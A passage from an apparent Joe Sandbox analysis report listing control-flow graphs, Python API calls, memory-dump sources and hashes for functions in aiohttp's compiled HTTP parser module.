call 7ffbaaf29db0 6397->6407 6398->6397 6404 7ffbaaf1305d-7ffbaaf13060 _Py_Dealloc 6398->6404 6402 7ffbaaf130d1-7ffbaaf130da 6400->6402 6403 7ffbaaf130c8-7ffbaaf130cb _Py_Dealloc 6400->6403 6401->6400 6408 7ffbaaf130dc _Py_Dealloc 6402->6408 6409 7ffbaaf130e2-7ffbaaf130eb 6402->6409 6403->6402 6404->6397 6406->6407 6412 7ffbaaf13071-7ffbaaf13074 _Py_Dealloc 6406->6412 6407->6348 6408->6409 6414 7ffbaaf130ed _Py_Dealloc 6409->6414 6415 7ffbaaf130f3-7ffbaaf130f7 6409->6415 6410->6411 6411->6321 6412->6407 6414->6415 6417 7ffbaaf13102-7ffbaaf13107 6415->6417 6418 7ffbaaf130f9-7ffbaaf130fc _Py_Dealloc 6415->6418 6417->6335 6418->6417
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$Err_FromLong_Size_t$FormatOccurredState_ThreadUnchecked
                                                                                                                                                                                                                                    • String ID: aiohttp._http_parser.cb_on_status$name '%U' is not defined
                                                                                                                                                                                                                                    • API String ID: 3601060896-3180148171
                                                                                                                                                                                                                                    • Opcode ID: e1818073de6947f094a44adc823b095d215a923775498d5ac8ef0b49592a4119
                                                                                                                                                                                                                                    • Instruction ID: ed279ad5076f40e23e690e82f608e008c81ccb72772590e8d472f42b246afc99
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1818073de6947f094a44adc823b095d215a923775498d5ac8ef0b49592a4119
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 880280B6A0AB42C1EA5A9F71E84427977A8FF84B94F0445B6CF5D87754CF3EE4068320
                                                                                                                                                                                                                                    Function 00007FFBAAF074B0 Relevance: 56.4, APIs: 31, Strings: 1, Instructions: 448COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6419 7ffbaaf074b0-7ffbaaf07b64 PyList_New 6421 7ffbaaf07b76-7ffbaaf07b88 PyTuple_New 6419->6421 6422 7ffbaaf07b66-7ffbaaf07b71 6419->6422 6424 7ffbaaf07b9a-7ffbaaf07bdc call 7ffbaaf06920 6421->6424 6425 7ffbaaf07b8a-7ffbaaf07b95 6421->6425 6423 7ffbaaf081d0-7ffbaaf081de 6422->6423 6426 7ffbaaf081ec-7ffbaaf081ef 6423->6426 6427 7ffbaaf081e0-7ffbaaf081e4 6423->6427 6436 7ffbaaf07bee-7ffbaaf07bf6 6424->6436 6437 7ffbaaf07bde-7ffbaaf07be9 6424->6437 6428 7ffbaaf081cd 6425->6428 6431 7ffbaaf08201-7ffbaaf0821b call 7ffbaaf29db0 6426->6431 6432 7ffbaaf081f1-7ffbaaf081f6 6426->6432 6427->6426 6430 7ffbaaf081e6 _Py_Dealloc 6427->6430 6428->6423 6430->6426 6441 7ffbaaf0821d 6431->6441 6442 7ffbaaf08248-7ffbaaf08264 6431->6442 6432->6431 6434 7ffbaaf081f8-7ffbaaf081fb _Py_Dealloc 6432->6434 6434->6431 6439 7ffbaaf07bf8 _Py_Dealloc 6436->6439 6440 7ffbaaf07bfe-7ffbaaf07c10 PyTuple_New 6436->6440 6437->6428 6439->6440 6443 7ffbaaf07c22-7ffbaaf07c64 call 7ffbaaf06920 6440->6443 6444 7ffbaaf07c12-7ffbaaf07c1d 6440->6444 6446 7ffbaaf08239-7ffbaaf0823d 6441->6446 6447 7ffbaaf08276-7ffbaaf08281 6442->6447 6448 7ffbaaf08266-7ffbaaf0826b 6442->6448 6452 7ffbaaf07c76-7ffbaaf07c7e 6443->6452 6453 7ffbaaf07c66-7ffbaaf07c71 6443->6453 6444->6428 6446->6442 6451 7ffbaaf0823f-7ffbaaf08242 _Py_Dealloc 6446->6451 6448->6447 6449 7ffbaaf0826d-7ffbaaf08270 _Py_Dealloc 6448->6449 6449->6447 6451->6442 6454 7ffbaaf07c86-7ffbaaf07c98 PyTuple_New 6452->6454 6455 7ffbaaf07c80 _Py_Dealloc 6452->6455 6453->6428 6456 7ffbaaf07caa-7ffbaaf07cec call 7ffbaaf06920 6454->6456 6457 7ffbaaf07c9a-7ffbaaf07ca5 6454->6457 6455->6454 6460 7ffbaaf07cfe-7ffbaaf07d06 6456->6460 6461 7ffbaaf07cee-7ffbaaf07cf9 6456->6461 6457->6428 6462 7ffbaaf07d08 _Py_Dealloc 6460->6462 6463 7ffbaaf07d0e-7ffbaaf07d20 PyTuple_New 6460->6463 6461->6428 6462->6463 6464 7ffbaaf07d32-7ffbaaf07d74 call 7ffbaaf06920 6463->6464 6465 7ffbaaf07d22-7ffbaaf07d2d 6463->6465 6468 7ffbaaf07d86-7ffbaaf07d8e 6464->6468 6469 7ffbaaf07d76-7ffbaaf07d81 6464->6469 6465->6428 6470 7ffbaaf07d96-7ffbaaf07da8 PyTuple_New 6468->6470 6471 7ffbaaf07d90 _Py_Dealloc 6468->6471 6469->6428 6472 7ffbaaf07dba-7ffbaaf07dfc call 7ffbaaf06920 6470->6472 6473 7ffbaaf07daa-7ffbaaf07db5 6470->6473 6471->6470 6476 7ffbaaf07e0e-7ffbaaf07e16 6472->6476 6477 7ffbaaf07dfe-7ffbaaf07e09 6472->6477 6473->6428 6478 7ffbaaf07e18 _Py_Dealloc 6476->6478 6479 7ffbaaf07e1e-7ffbaaf07e30 PyTuple_New 6476->6479 6477->6428 6478->6479 6480 7ffbaaf07e42-7ffbaaf07e84 call 7ffbaaf06920 6479->6480 6481 7ffbaaf07e32-7ffbaaf07e3d 6479->6481 6484 7ffbaaf07e96-7ffbaaf07e9e 6480->6484 6485 7ffbaaf07e86-7ffbaaf07e91 6480->6485 6481->6428 6486 7ffbaaf07ea6-7ffbaaf07eb8 PyTuple_New 6484->6486 6487 7ffbaaf07ea0 _Py_Dealloc 6484->6487 6485->6428 6488 7ffbaaf07eca-7ffbaaf07f0c call 7ffbaaf06920 6486->6488 6489 7ffbaaf07eba-7ffbaaf07ec5 6486->6489 6487->6486 6492 7ffbaaf07f1e-7ffbaaf07f26 6488->6492 6493 7ffbaaf07f0e-7ffbaaf07f19 6488->6493 6489->6428 6494 7ffbaaf07f28 _Py_Dealloc 6492->6494 6495 7ffbaaf07f2e-7ffbaaf07f40 PyTuple_New 6492->6495 6493->6428 6494->6495 6496 7ffbaaf07f52-7ffbaaf07f94 call 7ffbaaf06920 6495->6496 6497 7ffbaaf07f42-7ffbaaf07f4d 6495->6497 6500 7ffbaaf07fa6-7ffbaaf07fae 6496->6500 6501 7ffbaaf07f96-7ffbaaf07fa1 6496->6501 6497->6428 6502 7ffbaaf07fb6-7ffbaaf07fc8 PyTuple_New 6500->6502 6503 7ffbaaf07fb0 _Py_Dealloc 6500->6503 6501->6428 6504 7ffbaaf07fda-7ffbaaf0801c call 7ffbaaf06920 6502->6504 6505 7ffbaaf07fca-7ffbaaf07fd5 6502->6505 6503->6502 6508 7ffbaaf0802e-7ffbaaf08036 6504->6508 6509 7ffbaaf0801e-7ffbaaf08029 6504->6509 6505->6428 6510 7ffbaaf08038 _Py_Dealloc 6508->6510 6511 7ffbaaf0803e-7ffbaaf08050 PyTuple_New 6508->6511 6509->6428 6510->6511 6512 7ffbaaf08062-7ffbaaf080a4 call 7ffbaaf06920 6511->6512 6513 7ffbaaf08052-7ffbaaf0805d 6511->6513 6516 7ffbaaf080b6-7ffbaaf080be 6512->6516 6517 7ffbaaf080a6-7ffbaaf080b1 6512->6517 6513->6428 6518 7ffbaaf080c0 _Py_Dealloc 6516->6518 6519 7ffbaaf080c6-7ffbaaf080d5 call 7ffbaaf074c0 6516->6519 6517->6428 6518->6519 6522 7ffbaaf080e7-7ffbaaf080f6 call 7ffbaaf2ad60 6519->6522 6523 7ffbaaf080d7-7ffbaaf080e2 6519->6523 6526 7ffbaaf08108-7ffbaaf08110 6522->6526 6527 7ffbaaf080f8-7ffbaaf08103 6522->6527 6523->6428 6528 7ffbaaf08112 _Py_Dealloc 6526->6528 6529 7ffbaaf08118-7ffbaaf08136 PyUnicode_Join 6526->6529 6527->6428 6528->6529 6530 7ffbaaf08148-7ffbaaf0814d 6529->6530 6531 7ffbaaf08138-7ffbaaf08143 6529->6531 6532 7ffbaaf0814f-7ffbaaf08152 _Py_Dealloc 6530->6532 6533 7ffbaaf08158-7ffbaaf08177 6530->6533 6531->6428 6532->6533 6534 7ffbaaf08189-7ffbaaf0818c PyNumber_Add 6533->6534 6535 7ffbaaf08179-7ffbaaf0817c 6533->6535 6537 7ffbaaf08192-7ffbaaf08199 6534->6537 6535->6534 6536 7ffbaaf0817e-7ffbaaf08187 PyUnicode_Concat 6535->6536 6536->6537 6538 7ffbaaf0819b-7ffbaaf081a1 6537->6538 6539 7ffbaaf081a3-7ffbaaf081c0 call 7ffbaaf26a70 6537->6539 6540 7ffbaaf081c8 6538->6540 6543 7ffbaaf0821f-7ffbaaf08227 6539->6543 6544 7ffbaaf081c2 6539->6544 6540->6428 6545 7ffbaaf0822f-7ffbaaf08236 6543->6545 6546 7ffbaaf08229 _Py_Dealloc 6543->6546 6544->6540 6545->6446 6546->6545
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$List_Tuple_
                                                                                                                                                                                                                                    • String ID: aiohttp._http_parser.RawRequestMessage.__repr__
                                                                                                                                                                                                                                    • API String ID: 3363699560-1702197402
                                                                                                                                                                                                                                    • Opcode ID: d9ccd240431896c1797dc9621f621b226959769d8367d0c53bfe330686c413cc
                                                                                                                                                                                                                                    • Instruction ID: 050952e1520d4c2c3d63680d23b8627c0b32888d7b122db3668930d0fb3d1dae
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9ccd240431896c1797dc9621f621b226959769d8367d0c53bfe330686c413cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 392270B6A0AF01C0EB1A9F35D8401B83368FB58BE9F1545B1DE1E97790DE3ED44283A0
                                                                                                                                                                                                                                    Function 00007FFBAAF16FE0 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 249COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6547 7ffbaaf16fe0-7ffbaaf17017 PyLong_FromLong 6548 7ffbaaf17029-7ffbaaf17044 PySequence_Contains 6547->6548 6549 7ffbaaf17019-7ffbaaf17024 6547->6549 6551 7ffbaaf17053-7ffbaaf17057 6548->6551 6552 7ffbaaf17046-7ffbaaf17051 6548->6552 6550 7ffbaaf1734f 6549->6550 6553 7ffbaaf17356-7ffbaaf1736e call 7ffbaaf29db0 6550->6553 6555 7ffbaaf17062-7ffbaaf17064 6551->6555 6556 7ffbaaf17059-7ffbaaf1705c _Py_Dealloc 6551->6556 6554 7ffbaaf170d1-7ffbaaf170dc 6552->6554 6566 7ffbaaf17380-7ffbaaf17383 6553->6566 6567 7ffbaaf17370-7ffbaaf17375 6553->6567 6554->6553 6560 7ffbaaf170e2-7ffbaaf170eb _Py_Dealloc 6554->6560 6558 7ffbaaf171ea-7ffbaaf1720a 6555->6558 6559 7ffbaaf1706a-7ffbaaf1707b PyList_New 6555->6559 6556->6555 6561 7ffbaaf1720c-7ffbaaf1720f 6558->6561 6562 7ffbaaf17211 PyObject_GetAttr 6558->6562 6564 7ffbaaf1708d-7ffbaaf170c4 call 7ffbaaf278a0 6559->6564 6565 7ffbaaf1707d-7ffbaaf17088 6559->6565 6560->6553 6568 7ffbaaf17217-7ffbaaf17220 6561->6568 6562->6568 6580 7ffbaaf170f0-7ffbaaf170f4 6564->6580 6581 7ffbaaf170c6-7ffbaaf170cb 6564->6581 6565->6550 6572 7ffbaaf1739c-7ffbaaf173a0 6566->6572 6573 7ffbaaf17385 6566->6573 6567->6566 6571 7ffbaaf17377-7ffbaaf1737a _Py_Dealloc 6567->6571 6574 7ffbaaf17232-7ffbaaf17243 6568->6574 6575 7ffbaaf17222-7ffbaaf1722d 6568->6575 6571->6566 6577 7ffbaaf173ab-7ffbaaf173c5 6572->6577 6582 7ffbaaf173a2-7ffbaaf173a5 _Py_Dealloc 6572->6582 6573->6577 6578 7ffbaaf17245-7ffbaaf1724c 6574->6578 6579 7ffbaaf17269-7ffbaaf17298 call 7ffbaaf27060 6574->6579 6575->6550 6578->6579 6583 7ffbaaf1724e-7ffbaaf1725c 6578->6583 6592 7ffbaaf172a9-7ffbaaf172ac 6579->6592 6593 7ffbaaf1729a-7ffbaaf1729e 6579->6593 6584 7ffbaaf170ff-7ffbaaf1711b call 7ffbaaf27920 6580->6584 6585 7ffbaaf170f6-7ffbaaf170f9 _Py_Dealloc 6580->6585 6581->6554 6582->6577 6589 7ffbaaf1725e _Py_Dealloc 6583->6589 6590 7ffbaaf17264 6583->6590 6594 7ffbaaf1711d-7ffbaaf1712f 6584->6594 6595 7ffbaaf17134-7ffbaaf17140 6584->6595 6585->6584 6589->6590 6590->6579 6597 7ffbaaf172de-7ffbaaf172e2 6592->6597 6598 7ffbaaf172ae-7ffbaaf172c3 6592->6598 6593->6592 6596 7ffbaaf172a0-7ffbaaf172a3 _Py_Dealloc 6593->6596 6599 7ffbaaf172c9-7ffbaaf172cd 6594->6599 6600 7ffbaaf17142 _Py_Dealloc 6595->6600 6601 7ffbaaf17148-7ffbaaf1714c 6595->6601 6596->6592 6602 7ffbaaf172ed-7ffbaaf172f7 6597->6602 6603 7ffbaaf172e4-7ffbaaf172e7 _Py_Dealloc 6597->6603 6598->6553 6598->6599 6599->6553 6604 7ffbaaf172d3-7ffbaaf172dc _Py_Dealloc 6599->6604 6600->6601 6605 7ffbaaf1714e-7ffbaaf17151 _Py_Dealloc 6601->6605 6606 7ffbaaf17157-7ffbaaf17166 PyLong_FromLong 6601->6606 6607 7ffbaaf172fd-7ffbaaf17308 6602->6607 6608 7ffbaaf17396-7ffbaaf17399 6602->6608 6603->6602 6604->6553 6605->6606 6609 7ffbaaf17178-7ffbaaf17195 PyUnicode_Format 6606->6609 6610 7ffbaaf17168-7ffbaaf17173 6606->6610 6611 7ffbaaf17334-7ffbaaf17342 call 7ffbaaf173d0 6607->6611 6612 7ffbaaf1730a-7ffbaaf17332 PyErr_Format 6607->6612 6608->6572 6613 7ffbaaf171ae-7ffbaaf171b2 6609->6613 6614 7ffbaaf17197-7ffbaaf171a9 6609->6614 6610->6550 6621 7ffbaaf17344 6611->6621 6622 7ffbaaf17387-7ffbaaf1738b 6611->6622 6615 7ffbaaf1734a 6612->6615 6617 7ffbaaf171bd-7ffbaaf171cf call 7ffbaaf27190 6613->6617 6618 7ffbaaf171b4-7ffbaaf171b7 _Py_Dealloc 6613->6618 6614->6599 6615->6550 6625 7ffbaaf171d1-7ffbaaf171d4 _Py_Dealloc 6617->6625 6626 7ffbaaf171da-7ffbaaf171e5 6617->6626 6618->6617 6621->6615 6622->6608 6623 7ffbaaf1738d-7ffbaaf17390 _Py_Dealloc 6622->6623 6623->6608 6625->6626 6626->6550
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • PyLong_FromLong.PYTHON310(?,?,00000000,?,?,00007FFBAAF16FAE), ref: 00007FFBAAF1700B
                                                                                                                                                                                                                                    • PySequence_Contains.PYTHON310(?,?,00000000,?,?,00007FFBAAF16FAE), ref: 00007FFBAAF1703A
                                                                                                                                                                                                                                    • _Py_Dealloc.PYTHON310(?,?,00000000,?,?,00007FFBAAF16FAE), ref: 00007FFBAAF170E5
                                                                                                                                                                                                                                    • _Py_Dealloc.PYTHON310(?,?,00000000,?,?,00007FFBAAF16FAE), ref: 00007FFBAAF1737A
                                                                                                                                                                                                                                    • _Py_Dealloc.PYTHON310(?,?,00000000,?,?,00007FFBAAF16FAE), ref: 00007FFBAAF17390
                                                                                                                                                                                                                                    • _Py_Dealloc.PYTHON310(?,?,00000000,?,?,00007FFBAAF16FAE), ref: 00007FFBAAF173A5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$ContainsFromLongLong_Sequence_
                                                                                                                                                                                                                                    • String ID: Expected %s, got %.200s$aiohttp._http_parser.__pyx_unpickle_RawResponseMessage$tuple
                                                                                                                                                                                                                                    • API String ID: 356818705-1703308469
                                                                                                                                                                                                                                    • Opcode ID: 5a7875f50d93554aef7a727bb4c4ee124748226878ca5dea524b4e3c5adc8d4c
                                                                                                                                                                                                                                    • Instruction ID: 1b5b68518507751f43486c399d0fe34ace07714c93ce064d856334e4f2aef41a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a7875f50d93554aef7a727bb4c4ee124748226878ca5dea524b4e3c5adc8d4c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64B170A5A0AA46C1FB5E5F32E8142796798BF45F95F0480B2CE1E97750DF3EE4038B20
                                                                                                                                                                                                                                    Function 00007FFBAAF157D7 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 136COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6627 7ffbaaf157d7-7ffbaaf157ec 6628 7ffbaaf157ee-7ffbaaf157f8 6627->6628 6629 7ffbaaf1584f-7ffbaaf15888 _PyDict_GetItem_KnownHash 6627->6629 6630 7ffbaaf15809-7ffbaaf15822 call 7ffbaaf25c40 6628->6630 6631 7ffbaaf157fa-7ffbaaf15804 6628->6631 6632 7ffbaaf1588f-7ffbaaf15898 PyErr_Occurred 6629->6632 6633 7ffbaaf1588a-7ffbaaf1588d 6629->6633 6634 7ffbaaf158a9-7ffbaaf158ac 6630->6634 6646 7ffbaaf15828-7ffbaaf15831 PyErr_Occurred 6630->6646 6631->6634 6636 7ffbaaf1589e-7ffbaaf158a6 call 7ffbaaf25d60 6632->6636 6637 7ffbaaf1589a-7ffbaaf1589c 6632->6637 6633->6634 6639 7ffbaaf158ae-7ffbaaf158c0 6634->6639 6640 7ffbaaf158c5-7ffbaaf158d1 PyDict_New 6634->6640 6636->6634 6637->6634 6643 7ffbaaf15cea-7ffbaaf15d09 call 7ffbaaf29db0 6639->6643 6644 7ffbaaf158db-7ffbaaf158f7 PyDict_SetItem 6640->6644 6645 7ffbaaf158d3-7ffbaaf158d9 6640->6645 6656 7ffbaaf1597b-7ffbaaf159ae 6643->6656 6657 7ffbaaf15d0f 6643->6657 6648 7ffbaaf15901-7ffbaaf1591d call 7ffbaaf26f20 6644->6648 6649 7ffbaaf158f9-7ffbaaf158ff 6644->6649 6647 7ffbaaf15925-7ffbaaf15935 6645->6647 6646->6634 6650 7ffbaaf15833-7ffbaaf1584d PyErr_Format 6646->6650 6654 7ffbaaf1593b-7ffbaaf15944 _Py_Dealloc 6647->6654 6655 7ffbaaf15cd6-7ffbaaf15cd9 6647->6655 6663 7ffbaaf1591f 6648->6663 6664 7ffbaaf15949-7ffbaaf1594d 6648->6664 6649->6647 6650->6634 6654->6655 6655->6643 6659 7ffbaaf15cdb-7ffbaaf15cdf 6655->6659 6661 7ffbaaf159bf-7ffbaaf159d9 call 7ffbaaf32dc0 6656->6661 6662 7ffbaaf159b0-7ffbaaf159b4 6656->6662 6660 7ffbaaf1596c-7ffbaaf15970 6657->6660 6659->6643 6665 7ffbaaf15ce1-7ffbaaf15ce4 _Py_Dealloc 6659->6665 6660->6656 6666 7ffbaaf15972-7ffbaaf15975 _Py_Dealloc 6660->6666 6662->6661 6667 7ffbaaf159b6-7ffbaaf159b9 _Py_Dealloc 6662->6667 6663->6647 6669 7ffbaaf1594f-7ffbaaf15952 _Py_Dealloc 6664->6669 6670 7ffbaaf15958-7ffbaaf1595c 6664->6670 6665->6643 6666->6656 6667->6661 6669->6670 6671 7ffbaaf1595e-7ffbaaf15961 _Py_Dealloc 6670->6671 6672 7ffbaaf15967 6670->6672 6671->6672 6672->6660
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$Dict_$Err_$FormatHashItemItem_KnownOccurred
                                                                                                                                                                                                                                    • String ID: aiohttp._http_parser.parser_error_from_errno$name '%U' is not defined
                                                                                                                                                                                                                                    • API String ID: 1780638902-2115262026
                                                                                                                                                                                                                                    • Opcode ID: e6c056b6ab8cdebde5a69bcf983fb647829455c43ee330c3c3eb23d1c8eebb02
                                                                                                                                                                                                                                    • Instruction ID: 609ad4bcb6dfeaac13ad6175691795e9b6da91fd47968cef7d467f5750dba24e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6c056b6ab8cdebde5a69bcf983fb647829455c43ee330c3c3eb23d1c8eebb02
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50515FA5E0BA46C1FA5A9F32E8401B86798FF45F95F4840B6CE5D97350DE2EE4478330
                                                                                                                                                                                                                                    Function 00007FFBAAF0B810 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 208COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 6674 7ffbaaf0b810-7ffbaaf0b872 6675 7ffbaaf0b8bd-7ffbaaf0b8c4 6674->6675 6676 7ffbaaf0b874-7ffbaaf0b8bb PyObject_Init PyObject_GC_Track 6674->6676 6678 7ffbaaf0b8d1-7ffbaaf0b8db 6675->6678 6679 7ffbaaf0b8c6-7ffbaaf0b8cf 6675->6679 6677 7ffbaaf0b8f1-7ffbaaf0b99c 6676->6677 6680 7ffbaaf0bb2b-7ffbaaf0bb30 6677->6680 6681 7ffbaaf0b9a2-7ffbaaf0b9b0 6677->6681 6683 7ffbaaf0b8e5-7ffbaaf0b8eb 6678->6683 6679->6683 6684 7ffbaaf0bb36-7ffbaaf0bb4e call 7ffbaaf29db0 6680->6684 6685 7ffbaaf0b9b2 _Py_Dealloc 6681->6685 6686 7ffbaaf0b9b8-7ffbaaf0b9cb 6681->6686 6683->6677 6683->6680 6695 7ffbaaf0bb5f-7ffbaaf0bb7a 6684->6695 6696 7ffbaaf0bb50-7ffbaaf0bb54 6684->6696 6685->6686 6688 7ffbaaf0b9cd _Py_Dealloc 6686->6688 6689 7ffbaaf0b9d3-7ffbaaf0b9e3 6686->6689 6688->6689 6691 7ffbaaf0b9eb-7ffbaaf0b9ff 6689->6691 6692 7ffbaaf0b9e5 _Py_Dealloc 6689->6692 6693 7ffbaaf0ba01 _Py_Dealloc 6691->6693 6694 7ffbaaf0ba07-7ffbaaf0ba10 6691->6694 6692->6691 6693->6694 6697 7ffbaaf0ba12-7ffbaaf0ba23 6694->6697 6698 7ffbaaf0ba25-7ffbaaf0ba2f 6694->6698 6696->6695 6699 7ffbaaf0bb56-7ffbaaf0bb59 _Py_Dealloc 6696->6699 6700 7ffbaaf0ba36-7ffbaaf0ba39 6697->6700 6698->6700 6699->6695 6701 7ffbaaf0ba4b-7ffbaaf0ba53 6700->6701 6702 7ffbaaf0ba3b-7ffbaaf0ba46 6700->6702 6703 7ffbaaf0ba5b-7ffbaaf0ba72 6701->6703 6704 7ffbaaf0ba55 _Py_Dealloc 6701->6704 6702->6684 6705 7ffbaaf0ba74 _Py_Dealloc 6703->6705 6706 7ffbaaf0ba7a-7ffbaaf0ba86 6703->6706 6704->6703 6705->6706 6707 7ffbaaf0ba9b-7ffbaaf0baa5 6706->6707 6708 7ffbaaf0ba88-7ffbaaf0ba99 6706->6708 6709 7ffbaaf0baac-7ffbaaf0baaf 6707->6709 6708->6709 6710 7ffbaaf0babe-7ffbaaf0bac6 6709->6710 6711 7ffbaaf0bab1-7ffbaaf0babc 6709->6711 6712 7ffbaaf0bace-7ffbaaf0bada 6710->6712 6713 7ffbaaf0bac8 _Py_Dealloc 6710->6713 6711->6684 6714 7ffbaaf0badc-7ffbaaf0baed 6712->6714 6715 7ffbaaf0baef-7ffbaaf0baf9 6712->6715 6713->6712 6716 7ffbaaf0bb00-7ffbaaf0bb03 6714->6716 6715->6716 6717 7ffbaaf0bb12-7ffbaaf0bb1a 6716->6717 6718 7ffbaaf0bb05-7ffbaaf0bb10 6716->6718 6719 7ffbaaf0bb1c _Py_Dealloc 6717->6719 6720 7ffbaaf0bb22-7ffbaaf0bb29 6717->6720 6718->6684 6719->6720 6720->6696
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
